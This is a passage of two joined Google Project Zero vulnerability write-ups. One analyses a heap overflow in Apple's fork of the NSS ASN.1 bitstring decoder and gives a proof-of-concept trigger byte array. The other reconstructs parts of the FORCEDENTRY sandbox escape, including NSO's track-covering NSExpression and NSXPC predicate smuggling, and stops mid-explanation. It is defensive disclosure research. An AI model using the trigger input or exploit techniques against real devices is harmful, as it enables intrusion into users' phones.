At this point the NSS ASN.1 string parser allocates the output buffer for the parsed output string using the length L of that first input string. This buffer is an over-allocated worst case. The part which makes it really fun though is that NSS allocates the output buffer then promptly throws away that length! This might not be so obvious from quickly glancing through the code though. The buffer which is allocated is stored as the Data field of a buffer wrapper type:

typedef struct cssm_data {

    size_t Length;

    uint8_t * __nullable Data;

} SecAsn1Item, SecAsn1Oid;

(Recall that we passed in a pointer to a SecAsn1Item in the template; it's the Data field of that which gets filled in with the allocated string buffer pointer here. This type is very slightly different between NSS and Apple's fork, but the difference doesn't matter here.)

That Length field is not the size of the allocated Data buffer. It's a (type-specific) count which determines how many bits or bytes of the buffer pointed to by Data are valid. I say type-specific because for bit-strings Length is stored in units of bits but for other strings it's in units of bytes. (CVE-2016-1950 was a bug in NSS where the code mixed up those units.)

Rather than storing the allocated buffer size along with the buffer pointer, each time a substring/child string is encountered the parser walks back up the stack of currently-being-parsed states to find the inner-most definite length string. As it's walking up the states it examines each state to determine how much of its input it has consumed in order to be able to determine whether it's the case that the current to-be-parsed substring is indeed completely enclosed within the inner-most enclosing definite length string.

If that sounds complicated, it is! The logic which does this is here, and it took me a good few days to pull it apart enough to figure out what this was doing:

sec_asn1d_state *parent = sec_asn1d_get_enclosing_construct(state);

while (parent && parent->indefinite) {

  parent = sec_asn1d_get_enclosing_construct(parent);

}

unsigned long remaining = parent->pending;

parent = state;

do {

  if (!sec_asn1d_check_and_subtract_length(&remaining,

                                           parent->consumed,

                                           state->top)

      ||

      /* If parent->indefinite is true, parent->contents_length is

       * zero and this is a no-op. */

      !sec_asn1d_check_and_subtract_length(&remaining,

                                           parent->contents_length,

                                           state->top)

      ||

      /* If parent->indefinite is true, then ensure there is enough

       * space for an EOC tag of 2 bytes. */

      (  parent->indefinite

          &&

          !sec_asn1d_check_and_subtract_length(&remaining,

                                               2,

                                               state->top)

      )

    ) {

      /* This element is larger than its enclosing element, which is

       * invalid. */

       return;

    }

} while ((parent = sec_asn1d_get_enclosing_construct(parent))

         &&

         parent->indefinite);

It first walks up the state stack to find the innermost constructed definite state and uses its state->pending value as an upper bound. It then walks the state stack again and for each in-between state subtracts from that original value of pending how many bytes could have been consumed by those in between states. It's pretty clear that the pending value is therefore vitally important; it's used to determine an upper bound so if we could mess with it this "bounds check" could go wrong.

After figuring out that this was pretty clearly the only place where any kind of bounds checking takes place I looked back at the fix more closely.

We know that sec_asn1d_parse_bit_string is only the function which changed:

static unsigned long

sec_asn1d_parse_bit_string (sec_asn1d_state *state,

                            const char *buf, unsigned long len)

{

    unsigned char byte;

   

    /*PORT_Assert (state->pending > 0); */

    PORT_Assert (state->place == beforeBitString);

    if ((state->pending == 0) || (state->contents_length == 1)) {

        if (state->dest != NULL) {

            SecAsn1Item *item = (SecAsn1Item *)(state->dest);

            item->Data = NULL;

            item->Length = 0;

            state->place = beforeEndOfContents;

        }

        if(state->contents_length == 1) {

            /* skip over (unused) remainder byte */

            return 1;

        }

        else {

            return 0;

        }

    }

   

    if (len == 0) {

        state->top->status = needBytes;

        return 0;

    }

   

    byte = (unsigned char) *buf;

    if (byte > 7) {

        dprintf("decodeError: parse_bit_string remainder oflow\n");

        PORT_SetError (SEC_ERROR_BAD_DER);

        state->top->status = decodeError;

        return 0;

    }

   

    state->bit_string_unused_bits = byte;

    state->place = duringBitString;

    state->pending -= 1;

   

    return 1;

}

The highlighted region of the function are the characters which were removed by the patch. This function is meant to return the number of input bytes (pointed to by buf) which it consumed and my initial hunch was to notice that the patch removed a path through this function where you could get the count of input bytes consumed and pending out-of-sync. It should be the case that when they return 1 in the removed code they also decrement state->pending, as they do in the other place where this function returns 1.

I spent quite a while trying to figure out how you could actually turn that into something useful but in the end I don't think you can.

So what else is going on here?

This state is reached with buf pointing to the first byte after the length value of a primitive bitstring. state->contents_length is the value of that parsed length. Bitstrings, as discussed earlier, are a unique ASN.1 string type in that they have an extra meta-data byte at the beginning (the unused-bits count byte.) It's perfectly fine to have a definite zero-length string - indeed that's (sort-of) handled earlier than this in the prepareForContents state, which short-circuits straight to afterEndOfContents:

if (state->contents_length == 0 && (! state->indefinite)) {

  /*

   * A zero-length simple or constructed string; we are done.

   */

  state->place = afterEndOfContents;

Here they're detecting a definite-length string type with a content length of 0. But this doesn't handle the edge case of a bitstring which consists only of the unused-bits count byte. The state->contents_length value of that bitstring will be 1, but it doesn't actually have any "contents".

It's this case which the (state->contents_length == 1) conditional in sec_asn1d_parse_bit_string matches:

    if ((state->pending == 0) || (state->contents_length == 1)) {

        if (state->dest != NULL) {

            SecAsn1Item *item = (SecAsn1Item *)(state->dest);

            item->Data = NULL;

            item->Length = 0;

            state->place = beforeEndOfContents;

        }

        if(state->contents_length == 1) {

            /* skip over (unused) remainder byte */

            return 1;

        }

        else {

            return 0;

        }

    }

By setting state->place to beforeEndOfContents they are again trying to short-circuit the state machine to skip ahead to the state after the string contents have been consumed. But here they take an additional step which they didn't take when trying to achieve exactly the same thing in prepareForContents. In addition to updating state->place they also NULL out the dest SecAsn1Item's Data field and set the Length to 0.

I mentioned earlier that the new child states which are allocated to recursively parse the sub-strings of constructed strings get a copy of the parent's dest field (which is a pointer to a pointer to the output buffer.) This makes sense: that output buffer is only allocated once then gets recursively filled-in in a linear fashion by the children. (Technically this isn't actually how it works if the outermost string is indefinite length, there's separate handling for that case which instead builds a linked-list of substrings which are eventually concatenated, see sec_asn1d_concat_substrings.)

If the output buffer is only allocated once, what happens if you set Data to NULL like they do here? Taking a step back, does that actually make any sense at all?

No, I don't think it makes any sense. Setting Data to NULL at this point should at the very least cause a memory leak, as it's the only pointer to the output buffer.

The fun part though is that that's not the only consequence of NULLing out that pointer. item->Data is used to signal something else.

Here's a snippet from prepare_for_contents when it's determining whether there's enough space in the output buffer for this substring

} else if (state->substring) {

  /*

   * If we are a substring of a constructed string, then we may

   * not have to allocate anything (because our parent, the

   * actual constructed string, did it for us).  If we are a

   * substring and we *do* have to allocate, that means our

   * parent is an indefinite-length, so we allocate from our pool;

   * later our parent will copy our string into the aggregated

   * whole and free our pool allocation.

   */

  if (item->Data == NULL) {

    PORT_Assert (item->Length == 0);

    poolp = state->top->our_pool;

  } else {

    alloc_len = 0;

  }

As the comment implies, if both item->Data is NULL at this point and state->substring is true, then (they believe) it must be the case that they are currently parsing a substring of an outer-level indefinite string, which has no definite-sized buffer already allocated. In that case the meaning of the item->Data pointer is different to that which we describe earlier: it's merely a temporary buffer meant to hold only this substring. Just above here alloc_len was set to the content length of this substring; and for the outer-definite-length case it's vitally important that alloc_len then gets set to 0 here (which is really indicating that a buffer has already been allocated and they must not allocate a new one.)

To emphasize the potentially subtle point: the issue is that using this conjunction (state->substring && !item->Data) for determining whether this a substring of a definite length or outer-level-indefinite string is not the same as the method used by the convoluted bounds checking code we saw earlier. That method walks up the current state stack and checks the indefinite bits of the super-strings to determine whether they're processing a substring of an outer-level-indefinite string.

Putting that all together, you might be able to see where this is going... (but it is still pretty subtle.)

Assume that we have an outer definite-length constructed bitstring with three primitive bitstrings as substrings:

Upon encountering the first outer-most definite length constructed bitstring, the code will allocate a fixed-size buffer, large enough to store all the remaining input which makes up this string, which in this case is 42 bytes. At this point dest->Data points to that buffer.

They then allocate a child state, which gets a copy of the dest pointer (not a copy of the dest SecAsn1Item object; a copy of a pointer to it), and proceed to parse the first child substring.

This is a primitive bitstring with a length of 1 which triggers the vulnerable path in sec_asn1d_parse_bit_string and sets dest->Data to NULL. The state machine skips ahead to beforeEndOfContents then eventually the next substring gets parsed - this time with dest->Data == NULL.

Now the logic goes wrong in a bad way and, as we saw in the snippet above, a new dest->Data buffer gets allocated which is the size of only this substring (2 bytes) when in fact dest->Data should already point to a buffer large enough to hold the entire outer-level-indefinite input string. This bitstring's contents then get parsed and copied into that buffer.

Now we come to the third substring. dest->Data is no longer NULL; but the code now has no way of determining that the buffer was in fact only (erroneously) allocated to hold a single substring. It believes the invariant that item->Data only gets allocated once, when the first outer-level definite length string is encountered, and it's that fact alone which it uses to determine whether dest->Data points to a buffer large enough to have this substring appended to it. It then happily appends this third substring, writing outside the bounds of the buffer allocated to store only the second substring.

This gives you a great memory corruption primitive: you can cause allocations of a controlled size and then overflow them with an arbitrary number of arbitrary bytes.

Here's an example encoding for an ASN.1 bitstring which triggers this issue:

   uint8_t concat_bitstrings_constructed_definite_with_zero_len_realloc[]

        = {ASN1_CLASS_UNIVERSAL | ASN1_CONSTRUCTED | ASN1_BIT_STRING, // (0x23)

           0x4a, // initial allocation size

           ASN1_CLASS_UNIVERSAL | ASN1_PRIMITIVE | ASN1_BIT_STRING,

           0x1, // force item->Data = NULL

           0x0, // number of unused bits in the final byte

           ASN1_CLASS_UNIVERSAL | ASN1_PRIMITIVE | ASN1_BIT_STRING,

           0x2, // this is the reallocation size

           0x0, // number of unused bits in the final byte

           0xff, // only byte of bitstring

           ASN1_CLASS_UNIVERSAL | ASN1_PRIMITIVE | ASN1_BIT_STRING,

           0x41, // 64 actual bytes, plus the remainder, will cause 0x40 byte memcpy one byte in to 2 byte allocation

           0x0, // number of unused bits in the final byte

           0xff,

           0xff,// -- continues for overflow

Why wasn't this found by fuzzing?

This is a reasonable question to ask. This source code is really really hard to audit, even with the diff it was at least a week of work to figure out the true root cause of the bug. I'm not sure if I would have spotted this issue during a code audit. It's very broken but it's quite subtle and you have to figure out a lot about the state machine and the bounds-checking rules to see it - I think I might have given up before I figured it out and gone to look for something easier.

But the trigger test-case is neither structurally complex nor large, and feels within-grasp for a fuzzer. So why wasn't it found? I'll offer two points for discussion:

Perhaps it's not being fuzzed?

Or at least, it's not being fuzzed in the exact form which it appears in Apple's Security.framework library. I understand that both Mozilla and Google do fuzz the NSS ASN.1 parser and have found a bunch of vulnerabilities, but note that the key part of the vulnerable code ("|| (state->contents_length == 1" in sec_asn1d_parse_bit_string) isn't present in upstream NSS (more on that below.)

Can it be fuzzed effectively?

Even if you did build the Security.framework version of the code and used a coverage guided fuzzer, you might well not trigger any crashes. The code uses a custom heap allocator and you'd have to either replace that with direct calls to the system allocator or use ASAN's custom allocator hooks. Note that upstream NSS does do that, but as I understand it, Apple's fork doesn't.

History

I'm always interested in not just understanding how a vulnerability works but how it was introduced. This case is a particularly compelling example because once you understand the bug, the code construct initially looks extremely suspicious. It only exists in Apple's fork of NSS and the only impact of that change is to introduce a perfect memory corruption primitive. But let's go through the history of the code to convince ourselves that it is much more likely that it was just an unfortunate accident:

The earliest reference to this code I can find is this, which appears to be the initial checkin in the Mozilla CVS repo on March 31, 2000:

static unsigned long

sec_asn1d_parse_bit_string (sec_asn1d_state *state,

                            const char *buf, unsigned long len)

{

    unsigned char byte;

    PORT_Assert (state->pending > 0);

    PORT_Assert (state->place == beforeBitString);

    if (len == 0) {

        state->top->status = needBytes;

        return 0;

    }

    byte = (unsigned char) *buf;

    if (byte > 7) {

        PORT_SetError (SEC_ERROR_BAD_DER);

        state->top->status = decodeError;

        return 0;

    }

    state->bit_string_unused_bits = byte;

    state->place = duringBitString;

    state->pending -= 1;

    return 1;

}

On August 24th, 2001 the form of the code changed to something like the current version, in this commit with the message "Memory leak fixes.":

static unsigned long

sec_asn1d_parse_bit_string (sec_asn1d_state *state,

                            const char *buf, unsigned long len)

{

    unsigned char byte;

-   PORT_Assert (state->pending > 0);

    /*PORT_Assert (state->pending > 0); */

    PORT_Assert (state->place == beforeBitString);

+   if (state->pending == 0) {

+       if (state->dest != NULL) {

+           SECItem *item = (SECItem *)(state->dest);

+           item->data = NULL;

+           item->len = 0;

+           state->place = beforeEndOfContents;

+           return 0;

+       }

+   }

    if (len == 0) {

        state->top->status = needBytes;

        return 0;

    }

    byte = (unsigned char) *buf;

    if (byte > 7) {

        PORT_SetError (SEC_ERROR_BAD_DER);

        state->top->status = decodeError;

        return 0;

    }

    state->bit_string_unused_bits = byte;

    state->place = duringBitString;

    state->pending -= 1;

    return 1;

}

This commit added the item->data = NULL line but here it's only reachable when pending == 0. I am fairly convinced that this was dead code and not actually reachable (and that the PORT_Assert which they commented out was actually valid.)

The beforeBitString state (which leads to the sec_asn1d_parse_bit_string method being called) will always be preceded by the afterLength state (implemented by sec_asn1d_prepare_for_contents.) On entry to the afterLength state state->contents_length is equal to the parsed length field and  sec_asn1d_prepare_for_contents does:

state->pending = state->contents_length;

So in order to reach sec_asn1d_parse_bit_string with state->pending == 0, state->contents_length would also need to be 0 in sec_asn1d_prepare_for_contents.

That means that in the if/else decision tree below, at least one of the two conditionals must be true:

        if (state->contents_length == 0 && (! state->indefinite)) {

            /*

             * A zero-length simple or constructed string; we are done.

             */

            state->place = afterEndOfContents;

...

        } else if (state->indefinite) {

            /*

             * An indefinite-length string *must* be constructed!

             */

            dprintf("decodeError: prepare for contents indefinite not construncted\n");

            PORT_SetError (SEC_ERROR_BAD_DER);

            state->top->status = decodeError;

yet it is required that neither of those be true in order to reach the final else which is the only path to reaching sec_asn1d_parse_bit_string via the beforeBitString state:

        } else {

            /*

             * A non-zero-length simple string.

             */

            if (state->underlying_kind == SEC_ASN1_BIT_STRING)

                state->place = beforeBitString;

            else

                state->place = duringLeaf;

        }

So at that point (24 August 2001) the NSS codebase had some dead code which looked like it was trying to handle parsing an ASN.1 bitstring which didn't have an unused-bits byte. As we've seen in the rest of this post though, that handling is quite wrong, but it didn't matter as the code was unreachable.

The earliest reference to Apple's fork of that NSS code I can find is in the SecurityNssAsn1-11 package for OS X 10.3 (Panther) which would have been released October 24th, 2003. In that project we can find a CHANGES.apple file which tells us a little more about the origins of Apple's fork:

General Notes

-------------

1. This module, SecurityNssAsn1, is based on the Netscape Security

   Services ("NSS") portion of the Mozilla Browser project. The

   source upon which SecurityNssAsn1 was based was pulled from

   the Mozilla CVS repository, top of tree as of January 21, 2003.

   The SecurityNssAsn1 project contains only those portions of NSS

   used to perform BER encoding and decoding, along with minimal

   support required by the encode/decode routines.

2. The directory structure of SecurityNssAsn1 differs significantly

   from that of NSS, rendering simple diffs to document changes

   unwieldy. Diffs could still be performed on a file-by-file basis.

   

3. All Apple changes are flagged by the symbol __APPLE__, either

   via "#ifdef __APPLE__" or in a comment.

That document continues on to outline a number of broad changes which Apple made to the code, including reformatting the code and changing a number of APIs to add new features. We also learn the date at which Apple forked the code (January 21, 2003) so we can go back through a github mirror of the mozilla CVS repository to find the version of secasn1d.c as it would have appeared then and diff them.

From that diff we can see that the Apple developers actually made fairly significant changes in this initial import, indicating that this code underwent some level of review prior to importing it. For example:

@@ -1584,7 +1692,15 @@

     /*

      * If our child was just our end-of-contents octets, we are done.

      */

+       #ifdef  __APPLE__

+       /*

+        * Without the check for !child->indefinite, this path could

+        * be taken erroneously if the child is indefinite!

+        */

+       if(child->endofcontents && !child->indefinite) {

+       #else

     if (child->endofcontents) {

They were pretty clearly looking for potential correctness issues with the code while they were refactoring it. The example shown above is a non-trivial change and one which persists to this day. (And I have no idea whether the NSS or Apple version is correct!) Reading the diff we can see that not every change ended up being marked with #ifdef __APPLE__ or a comment. They also made this change to sec_asn1d_parse_bit_string:

@@ -1372,26 +1469,33 @@

     /*PORT_Assert (state->pending > 0); */

     PORT_Assert (state->place == beforeBitString);

 

-    if (state->pending == 0) {

-       if (state->dest != NULL) {

-           SECItem *item = (SECItem *)(state->dest);

-           item->data = NULL;

-           item->len = 0;

-           state->place = beforeEndOfContents;

-           return 0;

-       }

+    if ((state->pending == 0) || (state->contents_length == 1)) {

+               if (state->dest != NULL) {

+                       SECItem *item = (SECItem *)(state->dest);

+                       item->Data = NULL;

+                       item->Length = 0;

+                       state->place = beforeEndOfContents;

+               }

+               if(state->contents_length == 1) {

+                       /* skip over (unused) remainder byte */

+                       return 1;

+               }

+               else {

+                       return 0;

+               }

     }

In the context of all the other changes in this initial import this change looks much less suspicious than I first thought. My guess is that the Apple developers thought that Mozilla had missed handling the case of a bitstring with only the unused-bits bytes and attempted to add support for it. It looks like the state->pending == 0 conditional must have been Mozilla's check for handling a 0-length bitstring so therefore it was quite reasonable to think that the way it was handling that case by NULLing out item->data was the right thing to do, so it must also be correct to add the contents_length == 1 case here.

In reality the contents_length == 1 case was handled perfectly correctly anyway in sec_asn1d_parse_more_bit_string, but it wasn't unreasonable to assume that it had been overlooked based on what looked like a special case handling for the missing unused-bits byte in sec_asn1d_parse_bit_string.

The fix for the bug was simply to revert the change made during the initial import 18 years ago, making the dangerous but unreachable code unreachable once more:

    if ((state->pending == 0) || (state->contents_length == 1)) {

        if (state->dest != NULL) {

            SecAsn1Item *item = (SecAsn1Item *)(state->dest);

            item->Data = NULL;

            item->Length = 0;

            state->place = beforeEndOfContents;

        }

        if(state->contents_length == 1) {

            /* skip over (unused) remainder byte */

            return 1;

        }

        else {

            return 0;

        }

    }

Conclusions

Forking complicated code is complicated. In this case it took almost two decades to in the end just revert a change made during import. Even verifying whether this revert is correct is really hard.

The Mozilla and Apple codebases have continued to diverge since 2003. As I discovered slightly too late to be useful, the Mozilla code now has more comments trying to explain the decoder's "novel" memory safety approach.

Rewriting this code to be more understandable (and maybe even memory safe) is also distinctly non-trivial. The code doesn't just implement ASN.1 decoding; it also has to support safely decoding incorrectly encoded data, as described by this verbatim comment for example:

 /*

  * Okay, this is a hack.  It *should* be an error whether

  * pending is too big or too small, but it turns out that

  * we had a bug in our *old* DER encoder that ended up

  * counting an explicit header twice in the case where

  * the underlying type was an ANY.  So, because we cannot

  * prevent receiving these (our own certificate server can

  * send them to us), we need to be lenient and accept them.

  * To do so, we need to pretend as if we read all of the

  * bytes that the header said we would find, even though

  * we actually came up short.

  */

Verifying that a rewritten, simpler decoder also handles every hard-coded edge case correctly probably leads to it not being so simple after all.

‚úáGoogle Project Zero

FORCEDENTRY: Sandbox Escape

By: Ryan ‚ÄĒ

Posted by Ian Beer & Samuel Groß of Google Project Zero

We want to thank Citizen Lab for sharing a sample of the FORCEDENTRY exploit with us, and Apple’s Security Engineering and Architecture (SEAR) group for collaborating with us on the technical analysis. Any editorial opinions reflected below are solely Project Zero’s and do not necessarily reflect those of the organizations we collaborated with during this research.

Late last year we published a writeup of the initial remote code execution stage of FORCEDENTRY, the zero-click iMessage exploit attributed by Citizen Lab to NSO. By sending a .gif iMessage attachment (which was really a PDF) NSO were able to remotely trigger a heap buffer overflow in the ImageIO JBIG2 decoder. They used that vulnerability to bootstrap a powerful weird machine capable of loading the next stage in the infection process: the sandbox escape.

In this post we'll take a look at that sandbox escape. It's notable for using only logic bugs. In fact it's unclear where the features that it uses end and the vulnerabilities which it abuses begin. Both current and upcoming state-of-the-art mitigations such as Pointer Authentication and Memory Tagging have no impact at all on this sandbox escape.

An observation

During our initial analysis of the .gif file Samuel noticed that rendering the image appeared to leak memory. Running the heap tool after releasing all the associated resources gave the following output:

$ heap $pid

------------------------------------------------------------

All zones: 4631 nodes (826336 bytes)        

             

   COUNT    BYTES     AVG   CLASS_NAME   TYPE   BINARY          

   =====    =====     ===   ==========   ====   ======        

    1969   469120   238.3   non-object

     825    26400    32.0   JBIG2Bitmap  C++   CoreGraphics

heap was able to determine that the leaked memory contained JBIG2Bitmap objects.

Using the -address option we could find all the individual leaked bitmap objects:

$ heap -address JBIG2Bitmap $pid

and dump them out to files. One of those objects was quite unlike the others:

$ hexdump -C dumpXX.bin | head

00000000  62 70 6c 69 73 74 30 30  |bplist00|

...

00000018        24 76 65 72 73 69  |  $versi|

00000020  6f 6e 59 24 61 72 63 68  |onY$arch|

00000028  69 76 65 72 58 24 6f 62  |iverX$ob|

00000030  6a 65 63 74 73 54 24 74  |jectsT$t|

00000038  6f 70                    |op      |

00000040        4e 53 4b 65 79 65  |  NSKeye|

00000048  64 41 72 63 68 69 76 65  |dArchive|

It's clearly a serialized NSKeyedArchiver. Definitely not what you'd expect to see in a JBIG2Bitmap object. Running strings we see plenty of interesting things (noting that the URL below is redacted):

Objective-C class and selector names:

NSFunctionExpression

NSConstantValueExpression

NSConstantValue

expressionValueWithObject:context:

filteredArrayUsingPredicate:

_web_removeFileOnlyAtPath:

context:evaluateMobileSubscriberIdentity:

performSelectorOnMainThread:withObject:waitUntilDone:

...

The name of the file which delivered the exploit:

XXX.gif

Filesystems paths:

/tmp/com.apple.messages

/System/Library/PrivateFrameworks/SlideshowKit.framework/Frameworks/OpusFoundation.framework

a URL:

https://XXX.cloudfront.net/YYY/ZZZ/megalodon?AAA

Using plutil we can convert the bplist00 binary format to XML. Performing some post-processing and cleanup we can see that the top-level object in the NSKeyedArchiver is a serialized NSFunctionExpression object.

NSExpression NSPredicate NSExpression

If you've ever used Core Data or tried to filter a Objective-C collection you might have come across NSPredicates. According to Apple's public documentation they are used "to define logical conditions for constraining a search for a fetch or for in-memory filtering".

For example, in Objective-C you could filter an NSArray object like this:

  NSArray* names = @[@"one", @"two", @"three"];

  NSPredicate* pred;

  pred = [NSPredicate predicateWithFormat:

            @"SELF beginswith[c] 't'"];

  NSLog(@"%@", [names filteredArrayUsingPredicate:pred]);

The predicate is "SELF beginswith[c] 't'". This prints an NSArray containing only "two" and "three".

[NSPredicate predicateWithFormat] builds a predicate object by parsing a small query language, a little like an SQL query.

NSPredicates can be built up from NSExpressions, connected by NSComparisonPredicates (like less-than, greater-than and so on.)

NSExpressions themselves can be fairly complex, containing aggregate expressions (like "IN" and "CONTAINS"), subqueries, set expressions, and, most interestingly, function expressions.

Prior to 2007 (in OS X 10.4 and below) function expressions were limited to just the following five extra built-in methods: sum, count, min, max, and average.

But starting in OS X 10.5 (which would also be around the launch of iOS in 2007) NSFunctionExpressions were extended to allow arbitrary method invocations with the FUNCTION keyword:

  "FUNCTION('abc', 'stringByAppendingString', 'def')" => @"abcdef"

FUNCTION takes a target object, a selector and an optional list of arguments then invokes the selector on the object, passing the arguments. In this case it will allocate an NSString object @"abc" then invoke the stringByAppendingString: selector passing the NSString @"def", which will evaluate to the NSString @"abcdef".

In addition to the FUNCTION keyword there's CAST which allows full reflection-based access to all Objective-C types (as opposed to just being able to invoke selectors on literal strings and integers):

  "FUNCTION(CAST('NSFileManager', 'Class'), 'defaultManager')"

Here we can get access to the NSFileManager class and call the defaultManager selector to get a reference to a process's shared file manager instance.

These keywords exist in the string representation of NSPredicates and NSExpressions. Parsing those strings involves creating a graph of NSExpression objects, NSPredicate objects and their subclasses like NSFunctionExpression. It's a serialized version of such a graph which is present in the JBIG2 bitmap.

NSPredicates using the FUNCTION keyword are effectively Objective-C scripts. With some tricks it's possible to build nested function calls which can do almost anything you could do in procedural Objective-C. Figuring out some of those tricks was the key to the 2019 Real World CTF DezhouInstrumenz challenge, which would evaluate an attacker supplied NSExpression format string. The writeup by the challenge author is a great introduction to these ideas and I'd strongly recommend reading that now if you haven't. The rest of this post builds on the tricks described in that post.

A tale of two parts

The only job of the JBIG2 logic gate machine described in the previous blog post is to cause the deserialization and evaluation of an embedded NSFunctionExpression. No attempt is made to get native code execution, ROP, JOP or any similar technique.

Prior to iOS 14.5 the isa field of an Objective-C object was not protected by Pointer Authentication Codes (PAC), so the JBIG2 machine builds a fake Objective-C object with a fake isa such that the invocation of the dealloc selector causes the deserialization and evaluation of the NSFunctionExpression. This is very similar to the technique used by Samuel in the 2020 SLOP post.

This NSFunctionExpression has two purposes:

Firstly, it allocates and leaks an ASMKeepAlive object then tries to cover its tracks by finding and deleting the .gif file which delivered the exploit.

Secondly, it builds a payload NSPredicate object then triggers a logic bug to get that NSPredicate object evaluated in the CommCenter process, reachable from the IMTranscoderAgent sandbox via the com.apple.commcenter.xpc NSXPC service.

Let's look at those two parts separately:

Covering tracks

The outer level NSFunctionExpression calls performSelectorOnMainThread:withObject:waitUntilDone which in turn calls makeObjectsPerformSelector:@"expressionValueWithObject:context:" on an NSArray of four NSFunctionExpressions. This allows the four independent NSFunctionExpressions to be evaluated sequentially.

With some manual cleanup we can recover pseudo-Objective-C versions of the serialized NSFunctionExpressions.

The first one does this:

[[AMSKeepAlive alloc] initWithName:"KA"]

This allocates and then leaks an AppleMediaServices KeepAlive object. The exact purpose of this is unclear.

The second entry does this:

[[NSFileManager defaultManager] _web_removeFileOnlyAtPath:

  [@"/tmp/com.apple.messages" stringByAppendingPathComponent:

    [ [ [ [

            [NSFileManager defaultManager]

            enumeratorAtPath: @"/tmp/com.apple.messages"

          ]

          allObjects

        ]

        filteredArrayUsingPredicate:

          [

            [NSPredicate predicateWithFormat:

              [

                [@"SELF ENDSWITH '"

                  stringByAppendingString: "XXX.gif"]

                stringByAppendingString: "'"

      ]   ] ] ]

      firstObject

    ]

  ]

]

Reading these single expression NSFunctionExpressions is a little tricky; breaking that down into a more procedural form it's equivalent to this:

NSFileManager* fm = [NSFileManager defaultManager];

NSDirectoryEnumerator* dir_enum;

dir_enum = [fm enumeratorAtPath: @"/tmp/com.apple.messages"]

NSArray* allTmpFiles = [dir_enum allObjects];

NSString* filter;

filter = ["@"SELF ENDSWITH '" stringByAppendingString: "XXX.gif"];

filter = [filter stringByAppendingString: "'"];

NSPredicate* pred;

pred = [NSPredicate predicateWithFormat: filter]

NSArray* matches;

matches = [allTmpFiles filteredArrayUsingPredicate: pred];

NSString* gif_subpath = [matches firstObject];

NSString* root = @"/tmp/com.apple.messages";

NSString* full_path;

full_path = [root stringByAppendingPathComponent: gifSubpath];

[fm _web_removeFileOnlyAtPath: full_path];

This finds the XXX.gif file used to deliver the exploit which iMessage has stored somewhere under the /tmp/com.apple.messages folder and deletes it.

The other two NSFunctionExpressions build a payload and then trigger its evaluation in CommCenter. For that we need to look at NSXPC.

NSXPC

NSXPC is a semi-transparent remote-procedure-call mechanism for Objective-C. It allows the instantiation of proxy objects in one process which transparently forward method calls to the "real" object in another process:

https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingXPCServices.html

I say NSXPC is only semi-transparent because it does enforce some restrictions on what objects are allowed to traverse process boundaries. Any object "exported" via NSXPC must also define a protocol which designates which methods can be invoked and the allowable types for each argument. The NSXPC programming guide further explains the extra handling required for methods which require collections and other edge cases.

The low-level serialization used by NSXPC is the same explored by Natalie Silvanovich in her 2019 blog post looking at the fully-remote attack surface of the iPhone. An important observation in that post was that subclasses of classes with any level of inheritance are also allowed, as is always the case with NSKeyedUnarchiver deserialization.

This means that any protocol object which declares a particular type for a field will also, by design, accept any subclass of that type.

The logical extreme of this would be that a protocol which declared an argument type of NSObject would allow any subclass, which is the vast majority of all Objective-C classes.

Grep to the rescue

This is fairly easy to analyze automatically. Protocols are defined statically so we can just find them and check each one. Tools like RuntimeBrowser and classdump can parse the static protocol definitions and output human-readable source code. Grepping the output of RuntimeBrowser like this is sufficient to find dozens of cases of NSObject pointers in Objective-C protocols:

  $ egrep -Rn "\(NSObject \*\)arg" *

Not all the results are necessarily exposed via NSXPC, but some clearly are, including the following two matches in CoreTelephony.framework:

Frameworks/CoreTelephony.framework/\

CTXPCServiceSubscriberInterface-Protocol.h:39:

-(void)evaluateMobileSubscriberIdentity:

        (CTXPCServiceSubscriptionContext *)arg1

       identity:(NSObject *)arg2

       completion:(void (^)(NSError *))arg3;

Frameworks/CoreTelephony.framework/\

CTXPCServiceCarrierBundleInterface-Protocol.h:13:

-(void)setWiFiCallingSettingPreferences:

         (CTXPCServiceSubscriptionContext *)arg1

       key:(NSString *)arg2

       value:(NSObject *)arg3

       completion:(void (^)(NSError *))arg4;

evaluateMobileSubscriberIdentity string appears in the list of selector-like strings we first saw when running strings on the bplist00. Indeed, looking at the parsed and beautified NSFunctionExpression we see it doing this:

[ [ [CoreTelephonyClient alloc] init]

  context:X

  evaluateMobileSubscriberIdentity:Y]

This is a wrapper around the lower-level NSXPC code and the argument passed as Y above to the CoreTelephonyClient method corresponds to the identity:(NSObject *)arg2 argument passed via NSXPC to CommCenter (which is the process that hosts com.apple.commcenter.xpc, the NSXPC service underlying the CoreTelephonyClient). Since the parameter is explicitly named as NSObject* we can in fact pass any subclass of NSObject*, including an NSPredicate! Game over?

Parsing vs Evaluation

It's not quite that easy. The DezhouInstrumentz writeup discusses this attack surface and notes that there's an extra, specific mitigation. When an NSPredicate is deserialized by its initWithCoder: implementation it sets a flag which disables evaluation of the predicate until the allowEvaluation method is called.

So whilst you certainly can pass an NSPredicate* as the identity argument across NSXPC and get it deserialized in CommCenter, the implementation of evaluateMobileSubscriberIdentity: in CommCenter is definitely not going to call allowEvaluation:  to make the predicate safe for evaluation then evaluateWithObject: and then evaluate it.

Old techniques, new tricks

From the exploit we can see that they in fact pass an NSArray with two elements:

[0] = AVSpeechSynthesisVoice

[1] = PTSection {rows = NSArray { [0] = PTRow() }

The first element is an AVSpeechSynthesisVoice object and the second is a PTSection containing a single PTRow. Why?

PTSection and PTRow are both defined in the PrototypeTools private framework. PrototypeTools isn't loaded in the CommCenter target process. Let's look at what happens when an AVSpeechSynthesisVoice is deserialized:

Finding a voice

AVSpeechSynthesisVoice is implemented in AVFAudio.framework, which is loaded in CommCenter:

$ sudo vmmap `pgrep CommCenter` | grep AVFAudio

__TEXT  7ffa22c4c000-7ffa22d44000 r-x/r-x SM=COW \

/System/Library/Frameworks/AVFAudio.framework/Versions/A/AVFAudio

Assuming that this was the first time that an AVSpeechSynthesisVoice object was created inside CommCenter (which is quite likely) the Objective-C runtime will call the initialize method on the AVSpeechSynthesisVoice class before instantiating the first instance.

[AVSpeechSynthesisVoice initialize] has a dispatch_once block with the following code:

NSBundle* bundle;

bundle = [NSBundle bundleWithPath:

                     @"/System/Library/AccessibilityBundles/\

                         AXSpeechImplementation.bundle"];

if (![bundle isLoaded]) {

    NSError err;

    [bundle loadAndReturnError:&err]

}

So sending a serialized AVSpeechSynthesisVoice object will cause CommCenter to load the /System/Library/AccessibilityBundles/AXSpeechImplementation.bundle library. With some scripting using otool -L to list dependencies we can  find the following dependency chain from AXSpeechImplementation.bundle to PrototypeTools.framework:

